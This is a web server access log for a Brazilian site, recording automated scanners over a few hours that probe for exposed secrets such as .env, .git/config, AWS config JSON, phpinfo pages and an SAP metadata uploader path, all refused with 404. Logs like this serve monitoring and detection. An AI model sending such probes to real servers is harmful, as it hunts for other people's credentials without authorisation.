78.153.140.151 - - [29/Apr/2025:17:53:04 -0300] "GET /?format=json HTTP/1.1" 200 488 "-" "Mozilla/4.0 (compatible; MSIE 8.0; Windows NT 5.1; Trident/4.0; GTB7.5; chromeframe/30.0.1599.101; .NET CLR 1.1.4322; .NET CLR 3.0.04506.30; .NET CLR 3.0.4506.2152; .NET CLR 3.5.30729; WinNT-EVI 12.01.2010; MS-RTC LM 8; .NET CLR 2.0.50727; lib/5.0\\0195; Engine/4.00195; 89670803)"
vacivitta.com.br:80
78.153.140.151 - - [29/Apr/2025:17:53:05 -0300] "GET /AwsConfig.json HTTP/1.1" 404 - "-" "Mozilla/5.0 (Windows NT 6.3; WOW64; rv:52.59.12) Gecko/20160044 Firefox/52.59.12"
vacivitta.com.br:80
78.153.140.151 - - [29/Apr/2025:17:53:05 -0300] "GET /Awsconfig.json HTTP/1.1" 404 - "-" "Mozilla/5.0 (Linux; Android 4.4.2; 7040N Build/KVT49L) AppleWebKit/537.36 (KHTML, like Gecko) Version/4.0 Chrome/30.0.0.0 Mobile Safari/537.36"
vacivitta.com.br:80
78.153.140.151 - - [29/Apr/2025:17:53:05 -0300] "GET /_phpinf.php HTTP/1.1" 404 - "-" "Opera/9.80 (Windows NT 5.2; U; en) Presto/2.2.15 Version/10.10"
vacivitta.com.br:80
78.153.140.151 - - [29/Apr/2025:17:53:06 -0300] "GET /_phpinfo.php HTTP/1.1" 404 - "-" "Mozilla/5.0 (Windows NT 6.3; rv:40.0) Gecko/20100101 Firefox/40.0"
vacivitta.com.br:80
78.153.140.151 - - [29/Apr/2025:17:53:07 -0300] "GET /_wpeprivate/config.json HTTP/1.1" 404 - "-" "Mozilla/5.0 (Linux; Android 6.0.1; LGLS676 Build/MXB48T) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/65.0.3325.109 Mobile Safari/537.36"
vacivitta.com.br:80
78.153.140.151 - - [29/Apr/2025:17:53:07 -0300] "GET /configuration.php HTTP/1.1" 404 - "-" "Mozilla/5.0 (Linux; Android 4.4.2; HUAWEI Y360-U23 Build/HUAWEIY360-U23) AppleWebKit/537.36 (KHTML, like Gecko) Version/4.0 Chrome/30.0.0.0 Mobile Safari/537.36"
vacivitta.com.br:80
78.153.140.151 - - [29/Apr/2025:17:53:07 -0300] "GET /config/config.js HTTP/1.1" 404 - "-" "Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.1; WOW64; Trident/7.0; SLCC2; .NET CLR 2.0.50727; .NET CLR 3.5.30729; .NET CLR 3.0.30729; .NET CLR 1.1.4322; .NET4.0C; .NET4.0E)"
vacivitta.com.br:80
154.81.156.54 - - [29/Apr/2025:17:58:22 -0300] "GET / HTTP/1.1" 200 488 "-" "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/90.0.4430.85 Safari/537.36 Edg/90.0.818.46"
vacivitta.com.br:80
14.36.53.205 - - [29/Apr/2025:18:03:49 -0300] "GET / HTTP/1.1" 200 488 "-" "Mozilla/5.0"
vacivitta.com.br:80
18.222.124.31 - - [29/Apr/2025:18:27:14 -0300] "GET / HTTP/1.1" 200 488 "-" "Mozilla/5.0 (Macintosh; Intel Mac OS X 10_15_7) Chrome/126.0.0.0 Safari/537.36"
vacivitta.com.br:80
18.222.124.31 - - [29/Apr/2025:18:27:37 -0300] "\x16\x03\x01" 404 - "-" "-"
vacivitta.com.br:80
18.222.124.31 - - [29/Apr/2025:18:27:47 -0300] "\x16\x03\x01" 404 - "-" "-"
vacivitta.com.br:80
18.222.124.31 - - [29/Apr/2025:18:27:50 -0300] "SSH-2.0-Go" 404 - "-" "-"
vacivitta.com.br:80
18.222.124.31 - - [29/Apr/2025:18:30:13 -0300] "\n" 404 - "-" "-"
vacivitta.com.br:80
154.81.156.35 - - [29/Apr/2025:18:35:18 -0300] "GET / HTTP/1.1" 200 488 "-" "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/90.0.4430.85 Safari/537.36 Edg/90.0.818.46"
vacivitta.com.br:80
154.81.156.54 - - [29/Apr/2025:18:41:49 -0300] "GET / HTTP/1.1" 200 488 "-" "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/90.0.4430.85 Safari/537.36 Edg/90.0.818.46"
vacivitta.com.br:80
159.223.225.145 - - [29/Apr/2025:18:47:26 -0300] "GET /.env HTTP/1.1" 404 - "-" "Mozilla/5.0; Keydrop.io/1.0(onlyscans.com/about);"
vacivitta.com.br:80
159.223.225.145 - - [29/Apr/2025:18:47:26 -0300] "GET /.git/config HTTP/1.1" 404 - "-" "Mozilla/5.0; Keydrop.io/1.0(onlyscans.com/about);"
vacivitta.com.br:80
135.119.108.144 - - [29/Apr/2025:18:55:43 -0300] "GET /developmentserver/metadatauploader HTTP/1.1" 404 - "-" "Mozilla/5.0 zgrab/0.x"
vacivitta.com.br:80
